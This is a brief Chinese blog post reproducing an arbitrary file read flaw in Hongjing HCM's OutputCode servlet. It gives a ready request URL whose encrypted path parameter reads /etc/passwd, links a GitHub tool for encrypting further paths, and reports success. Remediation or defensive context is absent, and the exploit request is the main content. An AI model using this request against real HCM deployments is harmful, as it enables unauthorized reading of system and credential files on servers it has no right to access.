宏景HCM OutputCode任意文件读取漏洞

漏洞复现:

1、读取/etc/passwd
http:url/servlet/OutputCode?path=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP

其中path字段加密通过下面工具来实现

工具地址:https://github.com/wafinfo/DecryptTools

image

读取成功

image

posted @ 2024-06-12 09:22  都吃泡芙  阅读(283)  评论(0)    收藏  举报
//雪花飘落效果 //雪花飘落效果